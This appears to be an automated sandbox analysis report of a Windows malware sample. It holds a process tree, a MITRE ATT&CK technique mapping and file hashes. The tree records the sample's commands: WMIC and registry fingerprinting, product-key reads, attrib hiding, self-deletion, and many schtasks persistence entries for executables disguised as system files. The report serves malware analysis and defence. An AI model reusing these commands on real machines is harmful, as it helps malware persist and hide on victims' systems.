C:\Windows\System32\Wbem\WMIC.exewmic os get Caption7⤵PID:1600
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"6⤵PID:6420
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory7⤵PID:1672
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵PID:6704
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5988
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵PID:5396
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"6⤵PID:6168
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER7⤵
- Command and Scripting Interpreter: PowerShell
PID:6444 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"6⤵PID:3344
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Detects videocard installed
PID:2208 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"6⤵PID:1724
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault7⤵PID:6500
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe""6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6064 -
C:\Windows\system32\PING.EXEping localhost -n 37⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2260 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreService.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreService.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5312 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\agentComponentFontNet\bxoJGLIQD6QziGsZBKG.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5568 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\agentComponentFontNet\ijkdLO.bat" "6⤵
- System Location Discovery: System Language Discovery
PID:6404 -
C:\agentComponentFontNet\MsHyperPort.exe"C:\agentComponentFontNet\MsHyperPort.exe"7⤵
- Executes dropped EXE
PID:6508 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpCmdRun.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpCmdRun.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5912 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\chainReviewdhcp\zwrFyO.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5680 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\chainReviewdhcp\FBfKzmFJ0gnf1.bat" "6⤵
- System Location Discovery: System Language Discovery
PID:5524 -
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"7⤵
- Executes dropped EXE
PID:6884 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c attrib "+h " "+s " C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform3⤵PID:6076
-
C:\Windows\system32\attrib.exeattrib "+h " "+s " C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5648
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:400
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\agentComponentFontNet\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\agentComponentFontNet\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2244
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\agentComponentFontNet\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7088
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1664
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6776
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:7032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 9 /tr "'C:\agentComponentFontNet\TrustedInstaller.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\agentComponentFontNet\TrustedInstaller.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6348
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 13 /tr "'C:\agentComponentFontNet\TrustedInstaller.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RunShellR" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1712
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RunShell" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RunShellR" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:6972
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:3140
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6392 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca866518-cd46-4b71-9d13-4654c595eef9} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" gpu3⤵PID:6696
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a580688c-21eb-4a42-acf9-76b04f0d44e1} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" socket3⤵
- Checks processor information in registry
PID:968 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3280 -childID 1 -isForBrowser -prefsHandle 3272 -prefMapHandle 3268 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {227b3b5a-9769-42d2-82c6-aaf1c93b82a4} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab3⤵PID:1712
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3700 -childID 2 -isForBrowser -prefsHandle 3692 -prefMapHandle 3688 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64a83b9e-50d3-4e4e-a211-0eb3b8ad5577} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab3⤵PID:5728
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4324 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4380 -prefMapHandle 4336 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {00dd2c91-0b11-4dd0-a7fb-153fdfb0eaf1} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" utility3⤵
- Checks processor information in registry
PID:4640 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5300 -childID 3 -isForBrowser -prefsHandle 5292 -prefMapHandle 5288 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1add7f17-a727-49d2-a273-ddf5a1b1f578} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab3⤵PID:3616
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 4 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb1f84f5-dcf4-49e2-b08b-e7868880c1df} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab3⤵PID:2692
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5652 -childID 5 -isForBrowser -prefsHandle 5660 -prefMapHandle 5664 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2024e70-4a61-4d4d-a65c-e50d19b60da7} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab3⤵PID:3344
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6184 -childID 6 -isForBrowser -prefsHandle 6172 -prefMapHandle 6168 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4b28b32d-db7b-4ede-b8da-bac60c3f1cad} 6392 "\\.\pipe\gecko-crash-server-pipe.6392" tab3⤵PID:6368
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:7032 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd3833cc40,0x7ffd3833cc4c,0x7ffd3833cc582⤵PID:6540
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1860 /prefetch:22⤵PID:6800
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2204,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2212 /prefetch:32⤵PID:5156
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2280 /prefetch:82⤵PID:6488
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3120 /prefetch:12⤵PID:5696
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3368,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3380 /prefetch:12⤵PID:5772
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4480,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3660 /prefetch:12⤵PID:1728
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4652,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4648 /prefetch:82⤵PID:888
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4804 /prefetch:82⤵PID:6276
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4620,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:82⤵PID:4104
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:82⤵PID:5140
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4976,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4980 /prefetch:82⤵PID:6676
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5200 /prefetch:82⤵PID:6012
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4676 /prefetch:82⤵PID:5112
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4664 /prefetch:82⤵PID:6944
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5116,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4920 /prefetch:82⤵PID:5508
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:82⤵PID:5288
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5096,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4356 /prefetch:22⤵PID:5400
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=3112,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5652 /prefetch:12⤵PID:6212
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3140,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3448 /prefetch:12⤵PID:5292
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=3460,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:12⤵PID:1496
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5656,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3284 /prefetch:12⤵PID:7116
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3484,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5488 /prefetch:12⤵PID:2760
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5744,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5812 /prefetch:12⤵PID:5812
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=3244,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5712 /prefetch:12⤵PID:6584
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5728,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4872 /prefetch:12⤵PID:2840
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5692,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4804 /prefetch:12⤵PID:5168
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=5468,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4388 /prefetch:12⤵PID:5308
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5132,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5160 /prefetch:82⤵PID:6168
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:7144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:6884
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
3Hidden Files and Directories
3Modify Registry
3Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
6Remote System Discovery
1System Information Discovery
8System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
2Internet Connection Discovery
1Wi-Fi Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD5b424a017cc5a73e1e8207c44dfe05052
SHA1e3decf49562596f9a74573277a99bcdd66caf120
SHA256afe2a352ca1d045ea47346c8eb3336745c4f10d9ddb5575d5bfe27c635eb29a8
SHA5122c2d8e33101bab6a67734bc877c485fdc3493287bad60263e62a44e0718d422cf261fe3172e681347bcce93188b1efc70e279ad1ebaa192afba44dc86d1ffae2
-
Filesize
649B
MD5749fabb390cc38b0a8f85ff589dce565
SHA1e0bcec50db1af8db7dc09e1611e863cf63e4884f
SHA256777812a284597a4cdb057b02de778e13c515886918b11399f9447b30261e4aa7
SHA512a2f99d16495b1e6fe03bd26511cf5a331514ec0786fe081aa10acbbeb130454b309d13c03d5a41f476e731caa88c852f02f5eadf66343986f1f0223f83d34382
-
Filesize
63KB
MD554f20de8a9081fccaa118be5bf3aa347
SHA19a6f5952bca06500c4df3f5a26a54955e55ccc14
SHA256b47847a633f51ffc2135e83796b686532acbb5876025eac6d20a083502315834
SHA512488522b5d5dc119f11e33f295fc3a2537cfe8360287ba619eae02d70629d6bacf7ea9f8e85a05a1b9d84a0688922e97c7d754c42d5428363253765fee35f6d63
-
Filesize
1KB
MD510db4d0449ab20a4829e1570d2381bd2
SHA104a387e09dd10a7d8cb20d55f0979427bbf48368
